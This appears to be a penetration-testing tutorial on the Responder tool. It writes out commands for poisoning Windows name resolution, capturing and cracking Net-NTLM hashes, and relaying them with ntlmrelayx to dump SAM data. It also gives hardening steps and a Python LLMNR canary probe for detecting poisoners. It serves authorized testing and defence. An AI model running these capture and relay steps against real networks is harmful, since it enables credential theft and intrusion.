Responder: Capturing Credentials Like a Network Bandit
Responder is an LLMNR, NBT-NS and mDNS poisoner built for internal network attacks. It listens on a network interface, answers broadcast and multicast name-resolution requests with its own address, and runs a set of rogue servers (SMB, HTTP, LDAP, FTP, SMTP, POP3, IMAP, MSSQL and others, switched on and off in Responder.conf) so that the victim's authentication attempt lands on the attacker's machine. What usually comes out is a Net-NTLMv1 or Net-NTLMv2 challenge/response pair, which can be cracked offline or relayed but not passed-the-hash; where a clear-text protocol is in use (HTTP Basic auth, FTP, an LDAP simple bind) you get the password itself.
If you’re in a Windows environment and nobody changed the defaults, chances are Responder will catch something.
Key Protocols Targeted by Responder
Responder poisons the following by default:
- LLMNR (Link-Local Multicast Name Resolution)
- NBT-NS (NetBIOS Name Service)
- MDNS (Multicast DNS)
A Windows host that cannot resolve a name through DNS (a typo in a UNC path, a stale printer mapping, a share on a decommissioned server) falls back to asking the whole segment: "Who is printserver?" Responder yells back "That's me!", the client connects to Responder's rogue server for that protocol, and the authentication attempt comes rolling in. If you only want to see which names clients are asking for, run Responder with -A (analyze mode), which listens without poisoning anything.
When Should You Use Responder?
Use Responder in:
- Internal network assessments (especially in flat networks)
- Environments with Windows machines (where LLMNR/NBT-NS is still enabled)
- After plugging into a switch port or Wi-Fi network where no NAC or client isolation keeps you away from the clients
- VLANs with poorly segmented traffic
- As the first stage of a credential harvesting or relay operation
Installing Responder
sudo apt update
sudo apt install responder
Or clone from the repo (the SpiderLabs repository is archived; the maintained fork lives at https://github.com/lgandx/Responder, and from a clone you launch it as sudo python3 Responder.py instead of responder):
git clone https://github.com/SpiderLabs/Responder.git
cd Responder
Basic Usage
Start Responder on a specific interface (it needs root for raw sockets and for the low ports its rogue servers bind):
sudo responder -I eth0
Add -v for verbose output. Without it Responder prints only the first hash it captures per client and protocol and skips repeats; with it you see every capture:
sudo responder -I eth0 -v
Want more than SMB hashes? -w starts the rogue WPAD proxy. Windows browsers with "Automatically detect settings" enabled look up the name wpad; once Responder has poisoned that lookup they fetch wpad.dat from it and push their web traffic through its proxy, authenticating with NTLM without the user noticing. Add -F to force authentication on the wpad.dat request itself, and -b to demand HTTP Basic auth, which yields clear-text passwords at the cost of a visible login prompt:
sudo responder -I eth0 -w -v
Log files are saved in logs/ under the install directory (/usr/share/responder/logs/ on Kali):
Responder/logs/
Each capture is written to a per-protocol, per-client file such as SMB-NTLMv2-SSP-10.0.0.5.txt, the console output goes to Responder-Session.log, and everything is also stored in the SQLite database Responder.db next to Responder.conf.
What You Can Capture
- Net-NTLMv1/v2 challenge/response pairs (what Responder labels NTLMv1/NTLMv2 hashes) from SMB, HTTP, LDAP, MSSQL and its other NTLM-capable listeners. They crack offline with Hashcat or John but cannot be passed-the-hash, since each one is bound to the server challenge. NTLMv1 is far weaker: with --disable-ess and Responder's default fixed challenge 1122334455667788, DES-based cracking (the crack.sh approach) recovers the NT hash itself, and that can be passed.
- Clear-text credentials from protocols that carry them: HTTP Basic auth (force it with -b), FTP, POP3, IMAP, SMTP and LDAP simple binds.
- WPAD proxy credentials, when the rogue proxy is enabled with -w.
Cracking Captured Hashes
Concatenate the per-client NTLMv2 files from logs/ into one file first; one line per account is enough, extra captures of the same user only add cracking time. NTLMv2 example with Hashcat (mode 5600; NTLMv1 is mode 5500):
hashcat -m 5600 responder_hashes.txt rockyou.txt
John the Ripper (use netntlm for NTLMv1):
john --format=netntlmv2 responder_hashes.txt --wordlist=rockyou.txt
Hardening Against Responder
From the blue team or sysadmin side:
- Disable LLMNR via GPO: Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution" set to Enabled (registry: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast = 0).
- Disable NetBIOS over TCP/IP on every adapter (NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_*), or push it through the DHCP scope's Microsoft vendor option 001 "Microsoft Disable Netbios Option" = 2, and disable mDNS on Windows with EnableMDNS = 0 under HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters.
- Rely on DNS alone and fix the broken names that trigger the fallback (stale shares, typos in login scripts, old printer mappings); Responder's -A mode shows you which names your own clients are asking for.
- Disable WPAD (untick "Automatically detect settings" and stop the WinHttpAutoProxySvc service) or, if you need it, host wpad.dat on a name that resolves through DNS; keep wpad in the DNS server's global query block list (the Microsoft DNS default) so a rogue host cannot register it.
- Require SMB signing on servers and workstations, and LDAP signing plus channel binding on domain controllers, so a captured authentication cannot be relayed.
- Segment the network so broadcast domains are small and untrusted ports cannot reach workstations.
- Monitor for rogue LLMNR/NBT-NS responders: periodically resolve names that do not exist and alert on any reply, and alert on any host answering these protocols that is not supposed to.
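To make the "Who is printserver?" exchange from the Key Protocols section and the "monitor for rogue responders" advice above concrete, here is an added example (not code from the original post or from Responder): it builds an LLMNR query the way a Windows client does, builds the poisoned answer a tool like Responder sends back, parses both, and reuses the same packet code as a canary that asks for a random name nobody owns and reports any host that claims it. The attacker address 10.0.0.66, the canary- name prefix and the two-second wait are assumptions; the probe works from a Linux host on the segment without root and covers LLMNR only (NBT-NS uses a different wire encoding).

```python
"""Constructed example: LLMNR query, poisoned answer and a canary probe (LLMNR only; NBT-NS differs)."""
import os
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """DNS-style labels: one length byte per label, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_name(data: bytes, off: int):
    """Read a label sequence at `off`, following compression pointers; return (name, next offset)."""
    labels = []
    while True:
        n = data[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0 == 0xC0:                          # pointer to an earlier copy of the name
            ptr = ((n & 0x3F) << 8) | data[off]
            tail, _ = decode_name(data, ptr)
            return ".".join(labels + [tail]), off + 1
        labels.append(data[off:off + n].decode("ascii", "replace"))
        off += n


def build_query(name: str, txid: int) -> bytes:
    """What a client sends once DNS has failed: header (ID, flags, counts) + one A/IN question."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", 1, 1)


def parse_query(data: bytes):
    """Return (txid, name, qtype) of a single-question LLMNR query."""
    txid, flags, qdcount, *_ = struct.unpack(">HHHHHH", data[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    name, off = decode_name(data, 12)
    qtype, _qclass = struct.unpack(">HH", data[off:off + 4])
    return txid, name, qtype


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner does: echo ID and question, set the QR bit, answer with its own address."""
    txid, name, qtype = parse_query(query)
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack(">HH", qtype, 1)
    answer = encode_name(name) + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def parse_answer(data: bytes):
    """Return (txid, [A-record IPs]) from an LLMNR response; raise if it is not a response."""
    txid, flags, qdcount, ancount, *_ = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    off = 12
    for _ in range(qdcount):                          # skip the echoed question(s)
        _, off = decode_name(data, off)
        off += 4
    ips = []
    for _ in range(ancount):
        _, off = decode_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return txid, ips


def probe_for_poisoner(timeout: float = 2.0):
    """Canary: ask for a name nobody owns; any host that claims it is poisoning LLMNR."""
    name = "canary-" + os.urandom(4).hex()            # assumed prefix; random so it cannot exist
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:                                   # keep listening until the timeout
            data, (src, _port) = sock.recvfrom(512)
            try:
                rtxid, ips = parse_answer(data)
            except (ValueError, IndexError, struct.error):
                continue                              # not a well-formed response; ignore
            if rtxid == txid:
                hits.append((src, ips))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, hits


if __name__ == "__main__":
    name, hits = probe_for_poisoner()
    for src, ips in hits:
        print(f"[!] {src} answered for {name} with {ips}: an LLMNR poisoner is on this segment")
    if not hits:
        print(f"[+] no answer for {name}; nothing is poisoning LLMNR right now")
```

Run the probe from a scheduled job on a few hosts per VLAN: a legitimate network never answers for a random name, so any hit is worth an alert, and the source address points straight at the poisoner.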
Bonus: Use With SMB Relay Attacks
Relaying works against targets that do not require SMB signing (Windows workstations and member servers don't by default; domain controllers do). Check first, for example with nmap's smb2-security-mode script or NetExec's --gen-relay-list, then pair Responder with MultiRelay.py (ships with Responder) or Impacket's ntlmrelayx.py to forward the authentication instead of capturing it. Turn Responder's own SMB and HTTP servers off in Responder.conf (SMB = Off, HTTP = Off) so the incoming connection reaches the relay tool rather than being answered by Responder. ntlmrelayx's default action on a successful SMB relay is to dump the target's SAM; -smb2support is needed for SMB2 clients:
sudo ntlmrelayx.py -tf targets.txt -smb2support
Don’t Forget to Clean Up
To stop Responder:
sudo pkill responder
If you launched it from a clone as python3 Responder.py, the process name is python3, so use pkill -f Responder.py instead. Or just CTRL+C the running process.
If you modified any network settings (like firewall rules) or Responder.conf, revert them. The logs/ directory and Responder.db now hold other people's credentials: treat them as client data under the rules of engagement and hand them over or securely delete them when the engagement ends.
Final Thoughts
Responder is the low-hanging fruit shaker of internal pentesting. If it’s in play and the network is vulnerable, you’ll likely walk away with something. From credential harvesting to relay attacks, it’s a staple tool in every pentester’s toolkit.
TryHackMe Room Recommendation:
Responder — Practice using the tool and see how to catch those juicy NTLMv2 hashes.
